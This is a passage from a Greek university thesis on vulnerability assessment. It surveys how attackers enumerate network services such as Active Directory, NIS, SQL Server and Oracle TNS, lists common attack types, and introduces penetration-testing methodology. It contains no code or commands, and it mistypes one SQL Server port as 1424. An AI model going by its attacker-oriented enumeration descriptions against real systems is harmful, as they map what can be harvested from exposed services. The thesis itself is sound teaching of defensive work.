• Απαρίθμηση μέσω του Active Directory με το LDAP, TCP/UDP 389 και 3268

Η προσθήκη μιας βασιζόμενης στο πρωτόκολλο LDAP (Lightweight Directory Access

Protocol) υπηρεσίας καταλόγου από τη Microsoft, η οποία ονομάζεται Active Directory

(AD) και η οποία είναι σχεδιασμένη έτσι ώστε να παρέχει μια ενοποιημένη λογική

αναπαράσταση όλων των αντικειμένων τα οποία σχετίζονται με την τεχνολογική

υποδομή ενός οργανισμού, αποτελεί μια βασική πηγή συλλογής πληροφοριών για τον

εισβολέα. Η δημιουργία μια πιστοποιημένης συνόδου μέσω του πρωτοκόλλου LDAP

επιτρέπει σε έναν εισβολέα έναν εναλλακτικό μηχανισμό συλλογής πληροφοριών, εάν οι

θύρες που χρησιμοποιεί το NetBIOS είναι προστατευόμενες από ένα Ανάχωμα

Ασφάλειας (Firewall) ή μη διαθέσιμες. Με αυτή την τεχνική ο εισβολέας μπο ρεί να

συλλέξει πληροφορίες για όλους τους χρήστες και τις ομάδες του εξυπηρετητή.

• Απαρίθμηση μέσω Novell Netware, TCP 524 και IPX

Το Netware λόγω εγγενούς ευπάθειας του μπορεί να δώσει στους εισβολείς όλη τη βάση

δεδομένων με τις πληροφορίες του χωρίς να απαιτεί πιστοποίηση ταυτότητας από

κανέναν εξυπηρετητή ή δέντρο του NDS. Έτσι οι εισβολείς μπορούν να αποκτήσουν

πληροφορίες για τους εξυπηρετητές, τα δέντρα NDS, τις ομάδες, τους εκτυπωτές, τα

volumes του εξυπηρετητή και τα ονόματα χρηστών του δικτύου χωρίς να συνδεθούν σε

έναν server.

• Απαρίθμηση μέσω UNIX RPC, TCP/UDP 111 και 32771

Ένα από τα δημοφιλέστερα πρωτόκολλα για την επικοινωνία εφαρμογών μεταξύ τους

είναι το RPC (Remote Procedure Call). Το RPC χρησιμοποιείται για την αντιστοίχιση

αιτήσεων από client προγράμματα σε θύρες, τις οποίες αναθέτει δυναμικά στις ενεργές

εφαρμογές. Οι εισβολείς μπορούν να συλλέξουν πληροφορίες σχετικά με τις ενεργές

RPC εφαρμογές σε απομακρυσμένα συστήματα.

Page 70: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

70 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Απαρίθμηση μέσω NIS, Αρ. Προγράμματος RPC 100004

Μια άλλη πιθανή πηγή πληροφοριών για ένα δίκτυο βασιζόμενο σε σύστημα UNIX είναι

το NIS (Network Information System), μια κατανεμημένη βάση δεδομένων με

πληροφορίες δικτύου η οποία διαθέτει φτωχά έως ανύπαρκτα χαρακτηριστικά ασφάλειας.

Οι εισβολείς, αφού έχουν μάθει το όνομα NIS domain ενός εξυπηρετητή, μπορούν να

προσπελάσουν οποιονδήποτε από τους maps του NIS, χρησιμοποιώντας ένα απλό

ερώτημα RPC και να αποκτήσουν, μεταξύ άλλων, πληροφορίες των βάσεων δεδομένων

με συνθηματικά.

• Απαρίθμηση μέσω Υπηρεσίας SQL Resolution Service, UDP 1434

Ο Microsoft SQL Server ακροάζεται στη θύρα TCP 1424 για συνδέσεις από client

συστήματα. Από τον SQL Server 2000 και μετά η Microsoft υλοποίησε τη δυνατότητα

στέγασης πολλαπλών «αντιγράφων» του SQL Server στον ίδιο φυσικό υπολογιστή.

Σύμφωνα με τους κανόνες του TCP/IP, η θύρα 1433 μπορεί να χρησιμοποιηθεί σαν

προεπιλεγμένη μόνο για ένα από τα αντίγραφα σ’ ένα υπολογιστή. Στα υπόλοιπα

αντίγραφα πρέπει να αντιστοιχιστεί μια διαφορετική θύρα του TCP. Η υπηρεσία SQL

Server Resolution Service εξακριβώνει ποια αντίγραφα ακροάζονται σε ποιες θύρες για

απομακρυσμένα client συστήματα. Μέσω αυτής της υπηρεσίας οι εισβολείς έχουν τη

δυνατότητα να διερευνήσουν τη θύρα UDP 1434 και να εντοπίσουν τα αντίγραφα του

SQL Server που βρίσκονται σε κατάσταση ακρόασης στο συγκεκριμένο σύστημα, ενώ

χρησιμοποιώντας τεχνικές σάρωσης περιοχών διευθύνσεων IP και εύρεσης κωδικών

πρόσβασης με μεθόδους εξαντλητικής αναζήτησης (brute force) μπορούν να

ανακαλύψουν οποιοδήποτε περιβάλλον SQL με λανθασμένες ρυθμίσεις. Μπορούν

επιπλέον να εξαπολύσουν επιθέσεις υπερχείλισης καταχωρητή (buffer overflow).

• Απαρίθμηση μέσω Oracle TNS, TCP 1521/2483

Το Oracle TNS (Transparent Network Substrate) ακροάζεται συνήθως στη θύρα 1521 και

διαχειρίζεται την κυκλοφορία της βάσης δεδομένων μεταξύ κόμβου και εξυπηρετητή. Οι

εισβολείς εξετάζοντας το oracle TNS μπορούν να συλλέξουν πληροφορίες για το SID της

βάσης δεδομένων, την έκδοση, το λειτουργικό σύστημα καθώς και για διάφορες άλλες

ρυθμίσεις. Η γνώση του SID μιας ιδιαίτερης βάσης δεδομένων Oracle μπορεί να

χρησιμοποιηθεί από τον εισβολέα για επιθέσεις εξαντλητικής αναζήτησης (brute force)

εναντίον του server.

Page 71: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

71 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Απαρίθμηση για το NFS, TCP/UDP 2049

Εάν ο ι εισβο λείς εντο πίσουν μέσω μιας σάρωσης θυρών ότι η θύρα 20 4 9 (NFS) είναι

ανοιχτή σε ένα σύστημα-στόχο, μπορούν να δουν ποιοι ακριβώς κατάλογοι είναι

διαθέσιμοι στο δίκτυο.

Εικόνα 2.6: Τα 14 Σοβαρότερα Προβλήματα Ασφάλειας

Πηγή: Scambray J.- McClure S. – Kurtz G.,2009

Page 72: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

72 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

2.5 Τύποι επιθέσεων

Οι εισβολείς, αφού συλλέξουν όσες περισσότερες πληροφορίες μπορούν για το σύστημα-

στόχο, είναι πλέον έτοιμοι να επιτεθούν σε αυτό. Υπάρχουν πολύ τύποι επιθέσεων, οι πιο

συνηθισμένοι όμως είναι οι ακόλουθοι42

• Κοινωνικής Μηχανικής (Social Engineering): Αυτός ο τύπος επίθεσης χρησιμοποιείται

κυρίως για την υποκλοπή συνθηματικών. Ο εισβολέας, ο οποίος έχει εντοπίσει το όνομα

ενός διαχειριστή ή ενός υπευθύνου του συστήματος-στόχου, σύμφωνα με κάποια τεχνική

από αυτές που αναφέρθηκαν παραπάνω, επικοινωνεί με τον οργανισμό-στόχο μέσω

τηλεφώνου ή e-mail και προσποιούμενος τον υπεύθυνο προσπαθεί να αποσπάσει

πληροφορίες οι οποίες σχετίζονται με τα συνθηματικά του συστήματος.

:

• Άρνηση Υπηρεσίας (Denial Of Service): Αποτελεί μια αγαπημένη μορφή επίθεσης των

Hackers ιδιαίτερα των Hacktivist. Κατά την επίθεση αυτή ο εξυπηρετητής βομβαρδίζεται

με πακέτα μηνυμάτων με αποτέλεσμα να μην μπορεί να τα διαχειριστεί και να καταρρέει.

• Πλημμύρες (Floods): Είναι επιθέσεις άρνησης παροχής υπηρεσιών, οι οποίες στοχεύουν

στην εξάντληση πόρων, όπως του εύρους ζώνης του δικτύου ή της υπολογιστικής ισχύος

ενός υπολογιστή.

• Πλαστογράφηση E-mail: Ο εισβολέας διαμορφώνει έναν πελάτη e-mail με ψευδή

στοιχεία ώστε να φαίνεται ότι το e-mail προέρχεται από μια έμπιστη πηγή και αποστέλλει

στο θύμα ένα Δούρειο Ίππο ή μια σύνδεση προς μια μη αξιόπιστη ιστοσελίδα με σκοπό

να υποκλέψει χρήσιμα στοιχεία για το σύστημα-στόχο.

• Επιθέσεις Εξαντλητικής Αναζήτησης (Brute Force Attacks): Ο εισβολέας προσπαθεί

να εντοπίσει ένα έγκυρο συνδυασμό ονόματος λογαριασμού και συνθηματικού. Για το

σκοπό αυτό χρησιμοποιεί αυτοματοποιημένα εργαλεία και λίστες συνηθισμένων κωδικών

πρόσβασης, ονόματα και λέξεις από ένα λεξικό με σκοπό να μαντέψει έναν έγκυρο

συνδυασμό για λογαριασμούς διαχειριστή.

• Phising: Ο εισβολέας αναζητά στοιχεία λογαριασμών, μέσω της δημιουργίας μιας

πλαστής ιστοσελίδας, που μιμείται την εμφάνιση μιας έγκυρης, προσκαλώντας νόμιμους

κατόχους λογαριασμών να συνδεθούν, στέλνοντάς τους συνήθως μια σύνδεση μέσα σε

ένα e-mail το οποίο φαίνεται ότι προέρχεται από μια αξιόπιστη πηγή.

• Δούρειοι Ίπποι (Trojan Horses): Οι Δούρειοι Ίπποι είναι προγράμματα τα οποία

εγκαθίστανται κρυφά σε ένα σύστημα, είτε απευθείας από τον εισβολέα, είτε από έναν ιό

ή σκουλήκι υπολογιστή, είτε από έναν ανυποψίαστο χρήστη. Η Δούρειοι Ίπποι

μεταφέρονται συνήθως μέσω e-mail. Αφού εγκατασταθεί ο Δούρειος Ίππος επιστρέφει

πληροφορίες στον εισβολέα για το σύστημα που έχει προσβάλλει ή του παρέχει άμεση 42 Strebe M., σελ 30-36, 2004

Page 73: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

73 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

πρόσβαση σε αυτό. Συνήθως οι Δούρειοι Ίπποι λειτουργούν και ως κερκόπορτες (back

doors) παρέχοντας άμεσο έλεγχο του συστήματος στον εισβολέα.

• Υπερχείλιση Καταχωρητή (Buffer Overflow): Οι καταχωρητές συχνά

προγραμματίζονται να έχουν σταθερό μέγιστο μέγεθος ή προγραμματίζονται ώστε να

εμπιστεύονται μηνύματα τα οποία δηλώνουν το μέγεθός τους. Οι εισβολείς στέλνουν

μηνύματα που δηλώνουν ψευδές μέγεθος και ενσωματώνουν σε αυτά κώδικα σε γλώσσα

μηχανής με αποτέλεσμα να αποκτούν τον έλεγχο του συστήματος.

• Δρομολόγηση Προέλευσης (Source Routing): Είναι ένας μηχανισμός ελέγχου που

επιτρέπεται από το πρωτόκολλο ΙΡ, και ο οποίος επιτρέπει στον αποστολέα να καθορίζει

το δρόμο που θα ακολουθήσει ένα πακέτο μέσα σε ένα δίκτυο, αντί να βασίζεται στους

πίνακες δρομολόγησης που είναι ενσωματωμένοι μέσα στους ενδιάμεσους δρομολογητές.

Ο εισβολέας χρησιμοποιώντας την δρομολόγηση προέλευσης και προσποιούμενος ότι

είναι ένας ήδη συνδεδεμένος χρήστης, εισάγει πρόσθετες πληροφορίες κατά την

επικοινωνία ενός διακομιστή και ενός εξουσιοδοτημένου υπολογιστή πελάτη. Με αυτό

τον τρόπο μπορεί να αιτηθεί, προσποιούμενος το διαχειριστή του συστήματος, την

αλλαγή συνθηματικού ή να γράψει ενημερώσεις DNS σε έναν διακομιστή DNS, με

σκοπό την ανακατεύθυνσης των πελατών του δικτύου σε έναν εχθρικό διακομιστή που

βρίσκεται υπό τον έλεγχο του εισβολέα.

• Κλοπή Συνόδου (Hijack): Ο εισβολέας εισέρχεται σε μια ήδη πιστοποιημένη σύνδεση

ανάμεσα σε δυο κόμβους και υποκλέπτει τα στοιχεία του λογαριασμού που

χρησιμοποιήθηκαν για τον καθορισμό της σύνδεσης.

• Επιθέσεις Ενδιαμέσου (Man-In-The Middle): Στις επιθέσεις αυτού του τύπου ο

εισβολέας παρεμβάλλεται στην επικοινωνία ανάμεσα σε ένα διακομιστή και έναν πελάτη,

αναδρομολογώντας την κίνηση ΙΡ από τον πελάτη σε έναν υπολογιστή υποκλοπέα ή

ανακατευθύνοντας ένα μεταγωγέα χρησιμοποιώντας το πρωτόκολλο ARP (Address

Resolution Protocol). Ο υπολογιστής εισβολέας ανοίγει μια σύνδεση προς τον διακομιστή

εκ μέρους του πελάτη. Έτσι ο πελάτης θα νομίζει ότι επικοινωνεί με το διακομιστή και ο

διακομιστής με τον πελάτη ενώ ο υπολογιστής εισβολέας θα μπορεί να παρατηρεί όλη

την επικοινωνία ανάμεσα στο διακομιστή και τον πελάτη και να κάνει αλλαγές στα

δεδομένα που μεταφέρονται.

• Προσποίησης (Impersonation): Ο εισβολέας αποκτά πρόσβαση στο σύστημα μέσω των

δικαιωμάτων προσπέλασης ενός εξουσιοδοτημένου χρήστη τα οποία έχει καταφέρει να

υποκλέψει προηγουμένως.

• Εκμετάλλευση ευπαθειών του λογισμικού ή του λειτουργικού συστήματος

(Exploitations): Ο εισβολέας αποκτά πρόσβαση στο σύστημα μέσω γνωστών ευπαθειών

Page 74: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

74 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

του λειτουργικού συστήματος ή του λογισμικού το οποίο έχει εντοπίσει (π.χ. port

scanning) ότι χρησιμοποιεί το σύστημα-στόχος.

Page 75: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

75 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Κεφάλαιο 3 Penetration Testing

Η ευρεία χρήση των πληροφοριακών συστημάτων για την αποθήκευση, επεξεργασία και

μετάδοση ψηφιακής πληροφορίας αποτελεί μία πραγματικότητα της σύγχρονης εποχής. Η

ραγδαία εξέλιξη της τεχνολογίας, τα πλεονεκτήματα που παρέχει και οι τάσεις

παγκοσμιοποίησης ωθούν της επιχειρήσεις και τους οργανισμούς στην υιοθέτηση και

υλοποίηση δικτυοκεντρικών πληροφοριακών συστημάτων για την επίτευξη των σκοπών

τους. Προκειμένου να διασφαλιστεί η απρόσκοπτη λειτουργία του πληροφοριακού

συστήματος και να επιτευχθούν οι στόχοι του λαμβάνονται μέτρα προστασίας. Πώς μπορεί

όμως μια επιχείρηση ή ένας οργανισμός να γνωρίζει αν τα μέτρα προστασίας που έχει λάβει

είναι ικανοποιητικά; Προφανώς, μόνο αν αξιολογήσει την ασφάλεια του πληροφοριακού

συστήματος.

Η αξιολόγηση της ασφάλειας ενός πληροφοριακού συστήματος είναι η διαδικασία

καθορισμού του πόσο αποτελεσματικά μια οντότητα (κόμβος, σύστημα, δίκτυο, διαδικασία,

πρόσωπο – που είναι γνωστή ως αντικείμενο αξιολόγησης), η οποία αξιολογείται, πληροί

τους συγκεκριμένους στόχους ασφάλειας. Τρεις τύποι μεθόδων αξιολόγησης μπορούν να

χρησιμοποιηθούν για να επιτευχθεί αυτό: έλεγχος, εξέταση, συνέντευξη. Ό έλεγχος είναι η

διαδικασία υποβολής ενός ή περισσότερων αντικειμένων αξιολόγησης κάτω από

συγκεκριμένες συνθήκες, με σκοπό να συγκριθούν οι πραγματικές και αναμενόμενες

συμπεριφορές. Εξέταση είναι η διαδικασία ελέγχου, επιθεώρησης, επανεξέτασης, μελέτης ή

ανάλυσης ενός ή περισσότερων αντικειμένων αξιολόγησης με σκοπό την διευκόλυνση της

κατανόησης, την επίτευξη της αποσαφήνισης ή της άντληση στοιχείων. Συνέντευξη είναι η

διαδικασία διεξαγωγής συζητήσεων με μεμονωμένα άτομα ή ομάδες μέσα σε έναν

οργανισμό με σκοπό την διευκόλυνση της κατανόησης, την επίτευξη της αποσαφήνισης ή

την εξακρίβωση της θέσης των στοιχείων Τα αποτελέσματα της αξιολόγησης

χρησιμοποιούνται για να υποστηρίξουν τον προσδιορισμό της αποτελεσματικότητας του

ελέγχου ασφαλείας με την πάροδο του χρόνου43

.

43 National Institute of Standards and Technology, Technical Guide to Information Security Testing and Assessment,

NIST Special Publication 800-115, USA, October 2008

Page 76: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

76 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Μια επαναλαμβανόμενη και τεκμηριωμένη μεθοδολογία αξιολόγησης της ασφάλειας είναι

χρήσιμη δεδομένου ότι:

• παρέχει συνέπεια και δομή στον έλεγχο ασφάλειας, η οποία μπορεί να ελαχιστοποιήσει

τους κινδύνους ελέγχου

• επισπεύδει τη μετάβαση του νέου προσωπικού αξιολόγησης

• περιορίζει τους πόρους διευθύνσεων που συνδέονται με τις αξιολογήσεις της ασφάλειας.

Μια μεθοδολογία αξιολόγησης ασφάλειας πρέπει να περιλαμβάνει κατ’ ελάχιστο τρεις

φάσεις:

• Σχεδιασμό. Αποτελεί κρίσιμο σημείο για μια επιτυχημένη αξιολόγηση ασφάλειας και

αποσκοπεί στη συλλογή των απαραίτητων πληροφοριών για την εκτέλεση της

αξιολόγησης, όπως ποια είναι τα αγαθά που θα αξιολογηθούν, ποιοι οι κίνδυνοι που τα

απειλούν, ποια τα μέτρα προστασίας που έχουν ληφθεί και ποια προσέγγιση αξιολόγησης

θα ακολουθηθεί.

• Εκτέλεση. Πρωταρχικός στόχος της εκτέλεσης είναι να εντοπιστούν και να

επιβεβαιωθούν οι ευπάθειες του συστήματος. Σε αυτή τη φάση καθορίζονται οι μέθοδοι

και οι τεχνικές που θα χρησιμοποιηθούν.

• Μετά την εκτέλεση. Αυτή η φάση εστιάζει στην ανάλυση των ευπαθειών που έχουν

εντοπιστεί, στον προσδιορισμό της αιτίας τους και σε προτάσεις περιορισμού τους. Στο

τέλος συντάσσεται μια τελική αναφορά.

Υπάρχουν πολλές τεχνικές αξιολόγησης της ασφάλειας. Μια προτεινόμενη ομαδοποίησή

τους μπορεί να τις διακρίνει σε:

• Τεχνικές Αναθεώρησης (Review Techniques). Αυτές οι τεχνικές εξέτασης

χρησιμοποιούνται για να αξιολογήσουν τα συστήματα, τις εφαρμογές, τα δίκτυα, τις

πολιτικές ασφάλειας, τις διαδικασίες ανακάλυψης ευπαθειών, ενώ γενικά διεξάγονται μη

αυτοματοποιημένα. Περιλαμβάνουν την τεκμηρίωση, τα αρχεία καταγραφής (log), τα

ruleset, την αναθεώρηση διαμόρφωσης συστημάτων, την παρακολούθηση της κίνησης

στο δίκτυο (network sniffing) και τον έλεγχο ακεραιότητας αρχείων.

• Τεχνικές Προσδιορισμού και Ανάλυσης Στόχων (Target Identification an Analysis

Techniques). Αυτές οι τεχνικές ελέγχου μπορούν να προσδιορίσουν τα συστήματα, τις

θύρες και τις υπηρεσίες, οι οποίες περιέχουν πιθανές ευπάθειες. Μπορούν να

εκτελεσθούν χειροκίνητα αλλά γενικά εκτελούνται χρησιμοποιώντας αυτοματοποιημένα

εργαλεία. Περιλαμβάνουν την ανακάλυψη δικτύων, τον προσδιορισμό θυρών και

υπηρεσιών, την ανίχνευση ευπαθειών, την ανίχνευση ασύρματων δικτύων και την

εξέταση της ασφάλειας εφαρμογών.

Page 77: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

77 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Τεχνικές Επικύρωσης Ευπάθειας Στόχων (Target Vulnerability Validation

Techniques). Αυτές οι τεχνικές ελέγχου επιβεβαιώνουν την ύπαρξη των ευπαθειών, και

μπορούν να εκτελεσθούν είτε χειροκίνητα, είτε με τη χρησιμοποίηση

αυτοματοποιημένων εργαλείων, ανάλογα με τη συγκεκριμένη τεχνική που

χρησιμοποιείται και την ικανότητα της ομάδας ελέγχου. Οι τεχνικές επικύρωσης

ευπάθειας στόχων περιλαμβάνουν ελέγχους ανάκτησης συνθηματικών, διείσδυσης,

κοινωνικής μηχανικής και ελέγχου ασφάλειας εφαρμογών.

Στην παρούσα εργασία θα μας απασχολήσουν οι έλεγχοι διείσδυσης (penetration testing)

3.1 Τι είναι οι έλεγχοι διείσδυσης (Penetration Testing) Όπως αναφέρθηκε παραπάνω, οι έλεγχοι διείσδυσης (penetration testing) ανήκουν στην

ομάδα τεχνικών ελέγχων Επικύρωσης Ευπάθειας Στόχων (Target Vulnerability Validation

Techniques), οι οποίες χρησιμοποιούνται για την περαιτέρω διερεύνηση της ύπαρξης

πιθανών ευπαθειών σε ένα πληροφοριακό σύστημα. Στόχος των ελέγχων διείσδυσης είναι να

αποδειχτεί η ύπαρξη μιας ή περισσότερων ευπαθειών και ο προσδιορισμός των επιπτώσεών

τους στην ασφάλεια του συστήματος.

Έλεγχος διείσδυσης (Penetration testing) είναι ο έλεγχος της ασφάλειας ενός συστήματος

κατά τον οποίο ο αξιολογητής μιμούμενος επιθέσεις του πραγματικού κόσμου προσπαθεί να

εξακριβώσει μεθόδους οι οποίες παρακάμπτουν τα χαρακτηριστικά ασφάλειας μιας

εφαρμογής, ενός συστήματος ή ενός δικτύου. Συχνά περιλαμβάνει την πραγματοποίηση

επιθέσεων σε συστήματα και δεδομένα με τη χρήση εργαλείων και τεχνικών τα οποία

χρησιμοποιούν οι επιτιθέμενοι. Οι περισσότεροι έλεγχοι διείσδυσης αναζητούν

συνδυασμούς ευπαθειών σε ένα ή περισσότερα συστήματα οι οποίες μπορούν να παρέχουν

περισσότερες δυνατότητες πρόσβασης απ’ ότι η εξέταση μιας μεμονωμένης ευπάθειας.

Ο έλεγχοι διείσδυσης περιλαμβάνουν συχνά και μη-τεχνικές μεθόδους επίθεσης. Αυτές

αφορούν επιθέσεις που σχετίζονται με την παράκαμψη των φυσικών μέτρων ασφαλείας και

με επιθέσεις κοινωνικής μηχανικής. Για παράδειγμα, ένας ελεγκτής διείσδυσης (penetration

tester) μπορεί να παραβιάσει τους ελέγχους και τις διαδικασίες φυσικής ασφάλειας με σκοπό

να συνδεθεί σε ένα δίκτυο, να κλέψει εξοπλισμό, να αποσπάσει ευαίσθητες πληροφορίες

(ενδεχομένως με την εγκατάσταση συσκευών keylogging), ή να διακόψει τις υπηρεσίες

επικοινωνίας. Είναι σημαντικό κατά τη διενέργεια αυτών των ελέγχων να είναι

ενημερωμένοι οι υπεύθυνοι φυσικής ασφάλειας για το πως θα εξακριβώσουν τη νομιμότητα

Page 78: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

78 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

των δραστηριοτήτων του ελεγκτή. Αυτό μπορεί να γίνει μέσω της τεκμηρίωσης του ελέγχου.

Οι τεχνικές διείσδυσης μέσω κοινωνικής μηχανικής μπορούν να περιλαμβάνουν την

προσποίηση του ελεγκτή ότι καλεί από το τμήμα υποστήριξης του οργανισμού και ζητάει τα

συνθηματικά των χρηστών ή την κλήση στο τμήμα υποστήριξης του οργανισμού και την

αίτηση για την αλλαγή συνθηματικού.

Οι έλεγχοι διείσδυσης εκτός από τον εντοπισμό των ευπαθειών ενός πληροφοριακού

συστήματος, είναι χρήσιμοι γιατί προσδιορίζουν:

• κατά πόσο είναι ανεκτικό το σύστημα στα πραγματικά σχέδια επίθεσης των εισβολέων.

Είναι δηλαδή ένας τρόπος αξιολόγησης των μέτρων ασφάλειας (Firewall, Antivirus,

Intrusion Detection Systems, κλπ) που εφαρμόζονται τη δεδομένη χρονική στιγμή που

διενεργείται ο έλεγχος

• τα πιθανά επίπεδα επιδεξιότητας τα οποία χρειάζεται ένας επιτιθέμενος για να διεισδύσει

επιτυχημένα στο σύστημα

• τα πρόσθετα μέτρα προστασίας τα οποία χρειάζεται να ληφθούν προκειμένου να

περιοριστούν οι κίνδυνοι που απειλούν το σύστημα

• την ικανότητα των οργανισμών ή επιχειρήσεων να ανιχνεύουν επιθέσεις και να τις

αντιμετωπίζουν κατάλληλα

• την ποσότητα της πληροφορίας που είναι δημόσια διαθέσιμη

• την αποτελεσματικότητα της εφαρμογής μιας πολιτικής ασφάλειας

Οι έλεγχοι διείσδυσης, όσο χρήσιμοι και απαραίτητοι κι αν είναι για την αξιολόγηση της

ασφάλειας ενός πληροφοριακού συστήματος, δεν παύουν να το εκθέτουν σε κίνδυνο. Κατά

τη διενέργεια των ελέγχων υπάρχει κίνδυνος να βλαφτεί ή να καταστεί μη λειτουργικό το

σύστημα που εξετάζεται, ακόμα και αν έχουν ληφθεί όλα τα απαραίτητα μέτρα για τη

μείωση αυτού του κινδύνου. Για το λόγο αυτό οι έλεγχοι είναι απαραίτητο να διενεργούνται

από εξειδικευμένα αξιόπιστα και πεπειραμένα άτομα και μόνον μετά από προσεκτική μελέτη

και σχεδιασμό.

3.2 Μέθοδοι διενέργειας Ελέγχων Διείσδυσης (Penetration Testing) Οι μέθοδοι που χρησιμοποιούνται για τους έλεγχους διείσδυσης μπορούν να

κατηγοριοποιηθούν ανάλογα με την οπτική που χρησιμοποιείται κάθε φορά για τη

διενέργειά τους. Έτσι, εάν το κριτήριο είναι το κατά πόσο ένας εξωτερικός επιτιθέμενος ή

ένας χρήστης του συστήματος μπορούν να πραγματοποιήσουν μια επιτυχημένη επίθεση στο

Page 79: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

79 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

σύστημα, διακρίνονται σε εξωτερικούς (external) και εσωτερικούς (internal) ελέγχους

διείσδυσης. Εάν το κριτήριο είναι η προηγούμενη γνώση που διαθέτει ο εισβολέας για το

σύστημα στόχο και το περιβάλλον του, διακρίνονται σε φανερούς (overt ή white box testing)

και συγκαλυμμένους (covert ή black box testing) ελέγχους διείσδυσης. Επιπλέον σύμφωνα

με τη μεθοδολογία που προτείνεται στο OSSTMM44

